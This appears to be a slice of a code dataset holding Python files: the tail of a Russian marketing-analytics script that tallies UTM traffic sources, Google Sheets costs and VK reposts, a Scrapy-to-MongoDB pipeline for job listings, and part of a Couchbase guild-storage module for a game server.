int(stop[8:10]))\n\n\n dd = [d1 + datetime.timedelta(days=x) for x in range((d2 - d1).days + 1)]\n for x in dd:\n datedelta.append(str(x))\n\n\n\n #DELETE DATES\n for i in newdf['sended']:\n if i[:10] in datedelta or i==' ':\n pass\n else:\n newdf=newdf.drop(newdf.index[newdf['sended']==i])\n print(newdf)\n\n slovaritog = {'Уникальная': 0, 'Дайджест': 0, 'SMM репостов': 0,\n 'Инфопартнеры':0, 'Рассылка из юнисендера': 0, 'Промо в вузах': 0, 'Телеграм': 0,\n 'Таргетинг': 0,\n 'Веб-страница и слайдер': 0, 'Контекстная реклама': 0, 'Органика':0, 'Неопознанный трафик': 0}\n for i in list(newdf['new_col']):\n ii = str(i)\n if 'generalbase' in ii or 'mailchimp' in ii:\n slovaritog['Уникальная'] += 1\n elif 'digest' in ii or 'Digest' in 
ii:\n slovaritog['Дайджест'] += 1\n elif 'vk-wall' in ii or 'vk_wall' in ii:\n slovaritog['SMM репостов'] += 1\n elif 'ip-' in ii or 'ip_' in ii:\n slovaritog['Инфопартнеры'] += 1\n elif 'mail' in ii or 'email' in ii or 'Unisender' in ii or 'unisender' in ii or 'utm_source' in ii or 'UniSender' in ii:\n slovaritog['Рассылка из юнисендера'] += 1\n elif 'vuz-' in ii or 'vuz_' in ii:\n slovaritog['Промо в вузах'] += 1\n elif 'tg /' in ii or 'Tg /' in ii:\n slovaritog['Телеграм'] += 1\n elif 'vk / target' in ii or 'vk / targetpost' in ii or 'vk / target-story' in ii or 'insta / target' in ii or 'insta / targetpost' in ii or 'insta / target-story' in ii or 'fb / target' in ii or 'fb / targetpost' in ii or 'target' in ii:\n slovaritog['Таргетинг'] += 1\n elif 'cl-site' in ii or 'Сl-site' in ii or 'cl_site' in ii or 'Сl_site' in ii:\n slovaritog['Веб-страница и слайдер'] += 1\n elif 'google / cpc' in ii or 'youtube / instream' in ii or 'yandex / cpc' in ii:\n slovaritog['Контекстная реклама'] += 1\n elif i==' / ':\n slovaritog['Органика'] += 1\n else:\n slovaritog['Неопознанный трафик'] += 1\n\n return slovaritog\n\ndef infopartnerip(urlland,start,stop):\n dfip=connectIP('https://docs.google.com/spreadsheets/d/1WmDnz3794uoU_h7ho_hOPMISUA2CdXt_UA_8L9pcJ-s/edit?pli=1#gid=0')\n costdf = dfip[dfip.values == urlland].loc[:,['Дата выдачи','Стоимость ']]\n datedelta = []\n d1 = datetime.date(int(start[:4]), int(start[5:7]), int(start[8:10]))\n d2 = datetime.date(int(stop[:4]), int(stop[5:7]), int(stop[8:10]))\n\n\n # this will give you a list containing all of the dates\n dd = [d1 + datetime.timedelta(days=x) for x in range((d2 - d1).days + 1)]\n for x in dd:\n datedelta.append(str(x))\n\n for i in range(len(datedelta)):\n datedelta[i]=datetime.date(int(datedelta[i][:4]), int(datedelta[i][5:7]), int(datedelta[i][8:10])).strftime(\"%d.%m.%Y\")\n\n costdfprice=[]\n for i in costdf.index:\n if costdf.loc[i,'Дата выдачи'] in datedelta:\n costdfprice.append(costdf.loc[i,'Стоимость '])\n costdfpriceinint = [int(item) for item in costdfprice if item.isdigit()==True]\n ipKOLICHESTVO = len(costdfprice)\n sumcostdf = sum(costdfpriceinint)\n return [ipKOLICHESTVO,sumcostdf]\n\n\n\ndef SMMcountfunct(start,stop,urlland):\n '''\n s1 = start[-2:] + '/' + start[-5:-3] + '/' + start[0:4]\n unixtime1 = time.mktime(datetime.datetime.strptime(s1, \"%d/%m/%Y\").timetuple())\n s2 = stop[-2:] + '/' + stop[-5:-3] + '/' + stop[0:4]\n unixtime2 = time.mktime(datetime.datetime.strptime(s2, \"%d/%m/%Y\").timetuple())\n vk_session = vk_api.VkApi()\n vk_session.auth()\n\n vk = vk_session.get_api()\n SMMM = vk.wall.search(owner_id=-25758, query=heshteg, count=100)\n newwww = []\n for i in range(len(SMMM['items'])):\n if SMMM['items'][i]['date'] > int(unixtime1) and SMMM['items'][i]['date'] < int(unixtime2):\n newwww.append(SMMM['items'][i]['id'])'''\n\n\n dfip=connectIP('https://docs.google.com/spreadsheets/d/1WBPvHdGxyaqzFwKAskt_CFq9rTdMGHnQMc-Dr9MVNwE/edit#gid=0')\n costdf = dfip[dfip.values == urlland].loc[:,['Дата старта промо','Ссылка на пост']]\n datedelta = []\n d1 = datetime.date(int(start[:4]), int(start[5:7]), int(start[8:10]))\n d2 = datetime.date(int(stop[:4]), int(stop[5:7]), int(stop[8:10]))\n\n\n # this will give you a list containing all of the dates\n dd = [d1 + datetime.timedelta(days=x) for x in range((d2 - d1).days + 1)]\n for x in dd:\n datedelta.append(str(x))\n\n for i in range(len(datedelta)):\n datedelta[i]=datetime.date(int(datedelta[i][:4]), int(datedelta[i][5:7]), 
int(datedelta[i][8:10])).strftime(\"%d.%m.%Y\")\n\n urltopost=[]\n for i in costdf.index:\n if costdf.loc[i,'Дата старта промо'] in datedelta:\n numberpost=re.search(r'[_].+',costdf.loc[i,'Ссылка на пост']).group(0)[1:]\n if numberpost.isdigit():\n urltopost.append(int(numberpost))\n\n vk_session = vk_api.VkApi()\n vk_session.auth()\n vk = vk_session.get_api()\n idreposts = []\n for i in urltopost:\n slova = vk.wall.getReposts(owner_id=-25758, post_id=i, count=1000)\n for i in range(len(slova['items'])):\n if slova['items'][i]['from_id'] < 0:\n idreposts.append(slova['items'][i]['from_id'])\n\n return len(idreposts)\n\n\n\ndef main():\n landing = Langing.objects.all()\n dictItog={}\n\n q = Queue(connection=conn)\n\n result = q.enqueue(analitica,str(landing[0].land),str(landing[0].success),str(landing[0].start),str(landing[0].end))\n result1 = q.enqueue(colvodneyforday,str(landing[0].start),str(landing[0].end),str(landing[0].land))\n try:\n connecttocomplete = googlesheets(str(landing[0].complete),str(landing[0].start),str(landing[0].end))\n except:\n connecttocomplete={}\n\n\n try:\n connecttargeting = connectsheet('https://docs.google.com/spreadsheets/d/1lcHMPIw1AtzKx3DoFAVp_JDi2Cb_-DbP9krjtD7c69Q/edit#gid=237212384',str(landing[0].start),str(landing[0].land))\n except:\n connecttargeting={}\n\n\n try:\n \n \n infopartenrilist=infopartnerip(str(landing[0].land),str(landing[0].start),str(landing[0].end))\n except:\n infopartenrilist={}\n\n\n try:\n SMMcount=SMMcountfunct(str(landing[0].start),str(landing[0].end),str(landing[0].land))\n except:\n SMMcount=0\n #time.sleep(8)\n\n print(\"REZULT\"*100)\n print(result.result)\n print(result1.result)\n print(connecttargeting)\n print(infopartenrilist)\n print(SMMcount)\n print(connecttocomplete)\n \n dictItog=result.result\n connecttocompleteresult=connecttocomplete\n if bool(connecttocompleteresult) ==True:\n regfactnomer=0\n for i in dictItog['Источник']:\n dictItog['Регистрациифакт'][regfactnomer]=connecttocompleteresult[i]\n regfactnomer+=1\n dictItog['Конверсия']=[str(int(dictItog['Регистрациифакт'][i]/dictItog['Трафикфакт'][i]*100))+'%' if dictItog['Трафикфакт'][i]!=0 else '0%' for i in range(len(dictItog['Источник']))]\n else:\n pass\n \n try:\n dictItog['Количество'][7]=result1.result[0]\n except:\n pass\n try:\n dictItog['Количество'][8]=result1.result[1]\n except:\n pass\n try:\n dictItog['Количество'][9]=result1.result[2]\n except:\n pass\n try:\n dictItog['Количество'][10]=result1.result[3]\n except:\n pass\n try:\n dictItog['Количество'][0]=result1.result[4]\n except:\n pass\n try:\n dictItog['Количество'][1]=result1.result[5]\n except:\n pass\n try:\n dictItog['Количество'][6]=result1.result[6]\n except:\n pass\n try:\n dictItog['Трафикфакт'][7]=connecttargeting['Трафикфакт']\n except:\n pass\n try:\n dictItog['Бюджетплан'][7]=connecttargeting['Бюджетплан']\n except:\n pass\n try:\n dictItog['Бюджетфакт'][7]=connecttargeting['Бюджетфакт']\n except:\n pass\n try:\n dictItog['Количество'][3]=infopartenrilist[0]\n except:\n pass\n try:\n dictItog['Бюджетфакт'][3]=infopartenrilist[1]\n except:\n pass\n try:\n dictItog['Количество'][2]=SMMcount\n except:\n pass\n\n a=[]\n try:\n for i in range(len(dictItog['Трафикфакт'])):\n if int(dictItog['Количество'][i])!=0:\n a.append(int(int(dictItog['Трафикфакт'][i]) / int(dictItog['Количество'][i])))\n else:\n a.append('—')\n dictItog[\"Сила\"]=a\n except:\n pass\n #ITOGO\n dictItog['Источник'].append('Итого')\n dictItog['Количество'].append('—')\n dictItog['Сила'].append('—')\n 
dictItog['Трафикфакт'].append(sum([int(item) for item in dictItog['Трафикфакт']]))\n dictItog['Регистрациифакт'].append(sum([int(item) for item in dictItog['Регистрациифакт']]))\n if dictItog['Трафикфакт'][-1]!=0:\n dictItog['Конверсия'].append(str(int(dictItog['Регистрациифакт'][-1]/dictItog['Трафикфакт'][-1]*100))+'%')\n else:\n dictItog['Конверсия'].append('0%')\n dictItog['Бюджетплан'].append('—')\n dictItog['Бюджетфакт'].append('—')\n print(dictItog)\n return dictItog\n\n\ndef main_for_new_funnel():\n dictItog = {}\n name_utm={\n 'Уникальный пакет промо': 'all / changellenge / unical-promo',\n 'Уникальная рассылка': 'email / generalbase',\n 'Digest рассылка по всей базе': 'email / digest',\n 'Рассылка по сборному сегементу через mailchimp (например, те кто кликал на стажировки)': 'email / segment-mailchimp',\n 'Рассылка по сборной базе под конкретный проект (например, ИТшники из Уфы, 3-4 курс) или Рассылка по базе партнера чемпионата ': 'email / segment',\n 'рассылка по базе кейсеров': 'email / segment / cup',\n 'рассылка по IT базе': 'email / segment / it',\n 'рассылка по базе инженеров': 'email / segment / engineers',\n 'рассылка по базе нефтяников': 'email / segment / oil',\n 'рассылка по базе бизнес': 'email / segment / business',\n 'рассылка по базе partials': 'email / segment / partials',\n 'Рассылка по новой базе hh': 'email / segment / external',\n 'Рассылка по базе курса первокурсника': 'email / segment / kp',\n 'Рассылка по старой базе hh': 'email / segment / old-external',\n 'Рассылка по базе финансистов и экономистов': 'email / segment / fin',\n 'Рассылка по базе менеджмента': 'email / segment / manager',\n 'Рассылка по базе аналитиков': 'email / segment / analytic',\n 'рассылка по базе региона Спб': 'email / segment / spb',\n 'рассылка по базе региона Сибирь': 'email / segment / siberia',\n 'рассылка по базе региона Урал': 'email / segment / ural',\n 'рассылка по базе региона Волга': 'email / segment / volga',\n 'рассылка по базе региона Дальний Восток': 'email / segment / dv',\n 'рассылка по базе Казахстана': 'email / segment / kz',\n 'рассылка по прошлогодней базе проекта': 'email / segment / last-year',\n 'рассылка по прошлогодней базе Аламни': 'email / segment / alumni',\n 'рассылка по прошлогодней базе Школы': 'email / segment / school',\n 'рассылка по прошлогодней базе Тулкита': 'email / segment / toolkit',\n 'рассылка по прошлогодней базе стажировок': 'email / segment / internship',\n 'рассылка по базе б2б партнеров (холодные)': 'email / hr-digest / cold',\n 'рассылка по базе б2б партнеров (теплые)': 'email / hr-digest / warm',\n 'таргетинг тизеры vk': 'target / vk / tizer',\n 'таргетинг в новостой ленте vk': 'target / vk / post',\n 'таргетинг в VK Stories': 'target / vk / story',\n 'таргетинг в новостой ленте instagram': 'target / insta / post',\n 'таргетинг в Instagram Stories': 'target / insta / story',\n 'таргетинг stories fb': 'target / fb / story',\n 'таргетинг в новостой ленте fb': 'target / fb / post',\n 'таргетинг на лидформу fb': 'target / fb / leadform',\n 'таргетинг на лидформу вк': 'target / vk / leadform',\n 'SMM:стена вк основная группа': 'vk / global / post',\n 'SMM:стена вк группа Спб': 'vk / spb / post',\n 'SMM:стена вк группа Сибири': 'vk / siberia / post',\n 'SMM:стена вк группа Урала': 'vk / ural / post',\n 'SMM:стена вк группа Волги': 'vk / volga / post',\n 'SMM:стена вк группа Казахстана': 'vk / kz / post',\n 'SMM:рассылка-дайжест ВК в ЛС': 'vk / global / digest',\n 'SMM:рассылка о кейс-чемприонатах ВК в ЛС': 'vk / global / cups',\n 
'SMM:рассылка с вакансиями ВК в ЛС': 'vk / global / vacancy',\n 'SMM:рассылка о мероприятиях ВК в ЛС': 'vk / global / events',\n 'SMM:рассылка со статьями/полезными материалами ВК в ЛС': 'vk / global / article',\n 'SMM:стена клиентской группы ВК': 'post / (not set)',\n 'пост в телеграм-канале': 'tg / post',\n 'дайджест в телеграм-канале': 'tg / digest',\n 'ссылка на главном слайдере': 'cl-site / main / slider',\n 'ссылка на главной в разделе мероприятий': 'cl-site / main / events',\n 'ссылка на главной в разделе обучения/курсов': 'cl-site / main / education',\n 'ссылка на главной в разделе чемпионатов': 'cl-site / main / champs',\n 'пуш-уведомление на сайте': 'cl-site / push',\n 'ссылка на странице мероприятий': 'cl-site / page / event',\n 'ссылка на странице обучение': 'cl-site / page / education',\n 'ссылка на странице чемпионатов': 'cl-site / page / champs',\n 'ссылка на странице вакансии': 'cl-site / page / vacancy',\n 'поп-ап на сайте веб-версия': 'cl-site / popup / desktop',\n 'поп-ап на сайте мобильная версия': 'cl-site / popup / mobile',\n 'ссылка с личного кабинета': 'cl-site / main / personal',\n 'Ссылка по роликом на Yotube-канал': 'youtube / video',\n 'группа ФБ': 'fb / post',\n 'Страница АА в ФБ': 'fb / post / aa',\n 'Страница в Твиттере': 'twitter / post / aa',\n 'ссылка в БИО': 'inst / bio',\n 'ссылка в сториз': 'inst / stories',\n 'инфопартнеры:баннер на сайте': 'ip / banner',\n 'инфопартнеры:пост вконтакте': 'ip / vk-post',\n 'инфопартнеры:пост в Telegram': 'ip / tg-post',\n 'инфопартнеры:имейл рассылка': 'ip / email',\n 'инфопартнеры:статья или анонс на сайте': 'ip / article',\n 'инфопартнеры:пост в Twitter': 'ip / tw-post',\n 'инфопартнеры:пост в Instagram': 'ip / inst-post',\n 'инфопартнеры:пост в Facebook': 'ip / fb-post',\n 'Амбассадор договаривается о размещении на онлайн-ресурсах': 'amb / online',\n 'Амбассадор собирает офлайн-регистрации': 'amb / offline',\n 'Размещение в ЦРК': 'vuz / crk',\n 'Размещение в студсовете': 'vuz / studsovet',\n 'Размещение в профкоме': 'vuz / profkom',\n 'Размещение в кейс-клубе': 'vuz / kk',\n 'Размещение в медиа': 'vuz / media',\n 'Размещение в главной группе вуза': 'vuz / maingroup',\n 'Размещение для выпускников':'vuz / alumni',\n 'Размещение в бизнес-клубе': 'vuz / bk',\n 'Размещение на кафедре': 'vuz / kafedra',\n 'Размещение через преподавателей': 'vuz / teacher',\n 'Размещение в студенческом научном обществе': 'vuz / sno',\n 'Размещение через онлайн-аутсорс': 'vuz / online-outsors',\n 'Размещение через офлайн-аутсорс': 'vuz / offline-outsors',\n 'Роадшоу с флаерами/плакатами (регистрации по QR-коду)': 'vuz / flyer',\n 'Роадшоу с анкетами (с дальнейшей оцифровкой)': 'vuz / roadshow',\n 'Размещение в СМИ': 'smi /',\n 'прозвон по базе hh с отправкой рассылки': 'tlm / email / external',\n 'Прозвон по partials с отправкой рассылки': 'tlm / email / partials',\n 'Прозвон по базам прошлых лет с отправкой рассылки': 'tlm / email / last-year',\n 'Прозвон по каким-либо базам с отправкой рассылки': 'tlm / email',\n 'Прозвон с регистрацией на звонке': 'tlm / reg',\n 'Яндекс на поиске по брендовым запросам': 'yandex / cpc / brand',\n 'Яндекс РСЯ по брендовым запросам': 'yandex / cpm / brand',\n 'Яндекс на Поиске по запросам без упоминания бренда': 'yandex / cpc / general',\n 'Яндекс РСЯ по запросам без упоминания бренда': 'yandex / cpm / general',\n 'Google на поиске по брендовым запросам': 'google / cpc / brand',\n 'Google КМС по брендовым запросам': 'google / cpm / brand',\n 'Google на Поиске по запросам без упоминания бренда': 'google / 
cpc / general',\n 'Google КМС по запросам без упоминания бренда': 'google / cpm / general',\n 'Youtube контекст': 'youtube / cpm / general',\n 'Виртуальный рекрутер': 'external-lidgen / cpc / premium',\n 'Органика': '(direct) / (none)',\n\n }\n landing = Langing.objects.all()\n\n\n q = Queue(connection=conn)\n result =q.enqueue(analitica_new_funnel,str(landing[0].land), str(landing[0].success), str(landing[0].start),str(landing[0].end))\n\n\n result1=q.enqueue(colvodneyforday_new_funnel,str(landing[0].start), str(landing[0].end), str(landing[0].land))\n\n\n\n\n try:\n connecttocomplete = googlesheets_new_funnel(str(landing[0].complete), str(landing[0].start), str(landing[0].end))\n except:\n connecttocomplete = {}\n\n\n try:\n connecttargeting = connectsheet(\n 'https://docs.google.com/spreadsheets/d/1lcHMPIw1AtzKx3DoFAVp_JDi2Cb_-DbP9krjtD7c69Q/edit#gid=237212384',\n str(landing[0].start), str(landing[0].land))\n except:\n connecttargeting = {}\n\n try:\n\n infopartenrilist = infopartnerip(str(landing[0].land), str(landing[0].start), str(landing[0].end))\n except:\n infopartenrilist = {}\n\n try:\n SMMcount = SMMcountfunct(str(landing[0].start), str(landing[0].end), str(landing[0].land))\n except:\n SMMcount = 0\n #time.sleep(15)\n\n print(\"!\" * 100)\n print(result.result)\n print(\"!\" * 100)\n print(result1.result)\n print(\"!\" * 100)\n print(connecttocomplete)\n print(\"!\" * 100)\n print(connecttargeting)\n print(\"!\" * 100)\n print(infopartenrilist)\n print(\"!\" * 100)\n print(SMMcount)\n print(\"!\" * 100)\n\n\n #Concat analitica+colichestvo\n if result1.result is not None:\n for i in range(len(result.result['Источник'])-1):\n result.result['Количество'][i]=result1.result[name_utm[result.result['Источник'][i]]]\n\n\n\n dictItog = result.result\n\n connecttocompleteresult = connecttocomplete\n if bool(connecttocompleteresult) == True:\n for i in dictItog['Источник']:\n if i in connecttocomplete:\n dictItog['Регистрациифакт'][dictItog['Источник'].index(i)]=connecttocomplete[i]\n else:\n dictItog['Регистрациифакт'][dictItog['Источник'].index(i)]=0\n dictItog['Конверсия'] = [str(int(dictItog['Регистрациифакт'][i] / dictItog['Трафикфакт'][i] * 100)) + '%' if dictItog['Трафикфакт'][i] != 0 else '0%'for i in range(len(dictItog['Источник']))]\n else:\n pass\n\n\n if bool(connecttargeting) == True:\n for i in dictItog['Источник']:\n indexnumber=None\n if 'таргетинг' in i:\n indexnumber=dictItog['Источник'].index(i)\n break\n\n dictItog['Источник']=dictItog['Источник'][:indexnumber]+['Таргетинг общая информация']+dictItog['Источник'][indexnumber:]\n dictItog['Количество']=dictItog['Количество'][:indexnumber]+[0]+dictItog['Количество'][indexnumber:]\n dictItog['Сила']=dictItog['Сила'][:indexnumber]+['—']+dictItog['Сила'][indexnumber:]\n dictItog['Трафикфакт']=dictItog['Трафикфакт'][:indexnumber]+[connecttargeting['Трафикфакт']]+dictItog['Трафикфакт'][indexnumber:]\n dictItog['Регистрациифакт']=dictItog['Регистрациифакт'][:indexnumber]+[connecttargeting['Регистрациифакт']]+dictItog['Регистрациифакт'][indexnumber:]\n dictItog['Бюджетплан']=dictItog['Бюджетплан'][:indexnumber]+[connecttargeting['Бюджетплан']]+dictItog['Бюджетплан'][indexnumber:]\n dictItog['Бюджетфакт']=dictItog['Бюджетфакт'][:indexnumber]+[connecttargeting['Бюджетфакт']]+dictItog['Бюджетфакт'][indexnumber:]\n dictItog['Конверсия']=dictItog['Конверсия'][:indexnumber]+[connecttargeting['Конверсия']]+dictItog['Конверсия'][indexnumber:]\n\n\n if bool(infopartenrilist) == True:\n for i in dictItog['Источник']:\n 
indexnumber=None\n if 'инфопартнеры:' in i:\n indexnumber=dictItog['Источник'].index(i)\n break\n\n number_infopartenrilist_in_dict = 0\n for i in dictItog['Источник']:\n if 'инфопартнеры:' in i:\n number_infopartenrilist_in_dict+=1\n\n dictItog['Источник']=dictItog['Источник'][:indexnumber]+['Инфопартнеры общая информация']+dictItog['Источник'][indexnumber:]\n dictItog['Количество']=dictItog['Количество'][:indexnumber]+[infopartenrilist[0]]+dictItog['Количество'][indexnumber:]\n dictItog['Трафикфакт']=dictItog['Трафикфакт'][:indexnumber]+[sum([int(x) for x in dictItog['Трафикфакт'][indexnumber:indexnumber+number_infopartenrilist_in_dict]])]+dictItog['Трафикфакт'][indexnumber:]\n dictItog['Сила']=dictItog['Сила'][:indexnumber]+['—']+dictItog['Сила'][indexnumber:]\n dictItog['Регистрациифакт']=dictItog['Регистрациифакт'][:indexnumber]+[sum([int(x) for x in dictItog['Регистрациифакт'][indexnumber:indexnumber+number_infopartenrilist_in_dict]])]+dictItog['Регистрациифакт'][indexnumber:]\n dictItog['Бюджетплан']=dictItog['Бюджетплан'][:indexnumber]+['—']+dictItog['Бюджетплан'][indexnumber:]\n dictItog['Бюджетфакт']=dictItog['Бюджетфакт'][:indexnumber]+[infopartenrilist[1]]+dictItog['Бюджетфакт'][indexnumber:]\n dictItog['Конверсия']=dictItog['Конверсия'][:indexnumber]+['—']+dictItog['Конверсия'][indexnumber:]\n\n if SMMcount!=0:\n for i in dictItog['Источник']:\n indexnumber=None\n if 'SMM:' in i:\n indexnumber=dictItog['Источник'].index(i)\n break\n\n number_SMM_in_dict = 0\n for i in dictItog['Источник']:\n if 'SMM:' in i:\n number_SMM_in_dict+=1\n\n dictItog['Источник']=dictItog['Источник'][:indexnumber]+['SMM общая информация']+dictItog['Источник'][indexnumber:]\n dictItog['Количество']=dictItog['Количество'][:indexnumber]+[SMMcount]+dictItog['Количество'][indexnumber:]\n dictItog['Трафикфакт']=dictItog['Трафикфакт'][:indexnumber]+[sum([int(x) for x in dictItog['Трафикфакт'][indexnumber:indexnumber+number_SMM_in_dict]])]+dictItog['Трафикфакт'][indexnumber:]\n dictItog['Сила']=dictItog['Сила'][:indexnumber]+['—']+dictItog['Сила'][indexnumber:]\n dictItog['Регистрациифакт']=dictItog['Регистрациифакт'][:indexnumber]+[sum([int(x) for x in dictItog['Регистрациифакт'][indexnumber:indexnumber+number_SMM_in_dict]])]+dictItog['Регистрациифакт'][indexnumber:]\n dictItog['Бюджетплан']=dictItog['Бюджетплан'][:indexnumber]+['—']+dictItog['Бюджетплан'][indexnumber:]\n dictItog['Бюджетфакт']=dictItog['Бюджетфакт'][:indexnumber]+['—']+dictItog['Бюджетфакт'][indexnumber:]\n dictItog['Конверсия']=dictItog['Конверсия'][:indexnumber]+['—']+dictItog['Конверсия'][indexnumber:]\n\n #Сила\n a=[]\n try:\n for i in range(len(dictItog['Трафикфакт'])):\n if int(dictItog['Количество'][i])!=0:\n a.append(int(int(dictItog['Трафикфакт'][i]) / int(dictItog['Количество'][i])))\n else:\n a.append('—')\n dictItog[\"Сила\"]=a\n except:\n pass\n\n print(dictItog)\n\n return dictItog\n\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()\n","sub_path":"Startpage/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":54653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
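The project.py entry above classifies utm strings with a very long if/elif chain, while main_for_new_funnel already keeps a label-to-utm mapping (name_utm). A minimal sketch of the same counting driven by an ordered substring table; patterns and labels here are illustrative, not the script's real keys:

```python
# Sketch only: a data-driven alternative to the long elif chain above.
# Patterns and labels are illustrative, not the script's real keys.
from collections import Counter

UTM_LABELS = [                      # checked in order, first match wins
    ('email / segment / kp', 'freshman course mailing'),
    ('email / segment / spb', 'SPb region mailing'),
    ('tg / post', 'telegram channel post'),
    ('(direct) / (none)', 'organic'),
]

def categorize(utm_values):
    counts = Counter()
    for value in utm_values:
        label = next((lbl for pat, lbl in UTM_LABELS if pat in value),
                     'unrecognized traffic')
        counts[label] += 1
    # drop zero counts, as the original function does
    return {k: v for k, v in counts.items() if v != 0}

print(categorize(['tg / post', 'email / segment / kp', 'foo / bar']))
```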
+{"seq_id":"108810946","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport json\n\n\n# class ZhilianPipeline(object):\n#\n# def open_spider(self, spider):\n#\n# self.fp = open('beijing.txt','w',encoding='utf8')\n#\n#\n# def close_spider(self, spider):\n# self.fp.close()\n#\n# def process_item(self, item, spider):\n# dic = dict(item)\n# string = json.dumps(dic, ensure_ascii=False)\n# self.fp.write(string + '\\n')\n# return item\n\nimport pymongo\nclass MongoDBPipeline(object):\n def open_spider(self,spider):\n self.client = pymongo.MongoClient(host='localhost',port=27017)\n\n def close_spider(self,spider):\n self.client.close()\n\n def process_item(self,item,spider):\n dic = dict(item)\n db = self.client.zhilian\n city = dic['city_name']\n col = db.list_collection_names()\n if city in col:\n result = db[city].find({'hash_id': dic['hash_id']}).count()\n if result > 0:\n pass\n else:\n db[city].insert(dic)\n else:\n col = db[city]\n col.insert(dic)\n\n return item","sub_path":"spider/zhilian/zhilian/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"309730708","text":"import json\nimport logging\nimport random\n\nimport requests\n\nfrom cage.db import couchbase_db\nfrom cage import props\nfrom cage import utils\nfrom cage.server import config as server_config\nlogger = logging.getLogger(__name__)\n\ndef guild_with_name(guild_name):\n guild_name_lower = guild_name.lower()\n couch_cluster = server_config.get('couchbase', 'cluster_hosts')\n couch_cluster = json.loads(couch_cluster) # the cluster list is a JSON string\n couch_host = random.choice(couch_cluster)\n couch_bucket = server_config.get('couchbase', 'bucket') \n url = 'http://%s:8092/%s/_design/guild/_view/guild_view?key=\"%s\"&limit=1&skip=0' \\\n % (couch_host, couch_bucket, guild_name_lower)\n resp = requests.get(url)\n rows = resp.json()['rows']\n if rows:\n return next((row for row in rows if row['key'] == guild_name_lower), None)\n \n return None\n\ndef guilds_with_name(guild_name):\n guild_name_lower = guild_name.lower()\n couch_cluster = server_config.get('couchbase', 'cluster_hosts')\n couch_cluster = json.loads(couch_cluster) # the cluster list is a JSON string\n couch_host = random.choice(couch_cluster)\n couch_bucket = server_config.get('couchbase', 'bucket') \n #The \\u02ad in the endkey allows for partial searches \"MyCl\" returns MyClan \n url = 'http://%s:8092/%s/_design/guild/_view/guild_view?startkey=\"%s\"&endkey=\"%s\\u02ad\"&limit=50&skip=0' \\\n % (couch_host, couch_bucket, guild_name_lower, guild_name_lower)\n\n resp = requests.get(url)\n if resp.json().get('rows'):\n rows = resp.json()['rows']\n if rows:\n return [row['value'] for row in rows]\n\n return []\n\ndef open_guilds():\n from cage.guild import utils as guild_utils\n couch_cluster = server_config.get('couchbase', 'cluster_hosts')\n couch_cluster = json.loads(couch_cluster) # the cluster list is a JSON string\n couch_host = random.choice(couch_cluster)\n couch_bucket = server_config.get('couchbase', 'bucket') \n url = 'http://%s:8092/%s/_design/guild/_view/open_guilds?startkey=%d&endkey=%d&limit=50&skip=0&ascending=true' \\\n % (couch_host, couch_bucket, 1, guild_utils.GUILD_MAX_SIZE - 5)\n\n resp = requests.get(url)\n\n if resp.json().get('rows'):\n rows = resp.json()['rows']\n if rows:\n return [row['value']\n for row in rows\n ]\n return []\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef guild_get(client, guild_id):\n key = couchbase_db.guild_key(guild_id)\n result = client.gets(key)\n if result is None:\n return None\n\n guild_data, flags, cas = result\n guild_props = props.Props.from_json(guild_data)\n guild_props.cas = cas\n\n return guild_props\n\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef guild_set(client, guild):\n key = couchbase_db.guild_key(guild.id)\n\n# if guild.get('cas'):\n# result = client.cas(key, guild.to_json(), guild.cas)\n# else:\n result = client.set(key, guild.to_json())\n\n if result != 'STORED':\n raise Exception('Could not store guild for \"%s\" with guild \"%s result %s\"' %\n (key, guild, result))\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef guild_chat_get(client, guild_id):\n key = couchbase_db.guild_chat_key(guild_id)\n result = client.gets(key)\n if result is None:\n return []\n\n chat_messages, flags, cas = result\n guild_chat_list = json.loads(chat_messages)\n\n return guild_chat_list\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef guild_chat_set(client, guild_id, chat_messages):\n key = couchbase_db.guild_chat_key(guild_id)\n\n chat_messages = [ chat_message.to_dict() for chat_message 
in chat_messages]\n result = client.set(key, json.dumps(chat_messages))\n\n if result != 'STORED':\n raise Exception('Could not store guild chat messages for \"%s\" with guild \"%s result %s\"' %\n (key, chat_messages, result))\n\n\n@couchbase_db.with_client\ndef save_guild_member(client, guild_member):\n # set the value\n result = client.set(couchbase_db.guild_member_key(guild_member.guild_id, guild_member.player_id),\n guild_member.to_json())\n if result != 'STORED':\n logger.critical('Could not store guild member change for \"%s %s\"', guild_member.guild_id, guild_member.player_id)\n\n\n@couchbase_db.with_client\ndef get_guild_member(client, player_id, guild_id):\n member_data = client.get(couchbase_db.guild_member_key(guild_id, player_id))\n if member_data is None:\n return None\n\n member = props.Props.from_json(member_data[0])\n return member\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef delete_guild_member(client, key):\n result = client.delete(key)\n if result != 'DELETED':\n logger.critical('Could not delete guild member \"%s\" result %s', key, result)\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef delete_guild_member_with_ids(client, player_id, guild_id):\n result = client.delete(couchbase_db.guild_member_key(guild_id, player_id))\n if result != 'DELETED':\n logger.critical('Could not delete guild member \"%s\" result %s', couchbase_db.guild_member_key(guild_id, player_id), result)\n\n@couchbase_db.with_client\ndef save_guild_membership_action(client, guild_membership_record):\n # set the value\n result = client.set(couchbase_db.guild_membership_key(guild_membership_record.player_id),\n guild_membership_record.to_json())\n if result != 'STORED':\n logger.critical('Could not store guild membership change for \"%s\"', guild_membership_record.player_id)\n\n\n@couchbase_db.with_client\ndef get_guild_membership_action(client, key):\n membership_data = client.get(key)\n if membership_data is None:\n return None\n\n action = props.Props.from_json(membership_data[0])\n return action\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef delete_guild_membership_action(client, key):\n result = client.delete(key)\n if result != 'DELETED':\n logger.critical('Could not delete guild membership action \"%s\" result %s', key, result)\n\n@utils.print_timing(logger)\n@utils.statsd_timing()\ndef player_guild_membership_actions(player_id):\n \"\"\"\n 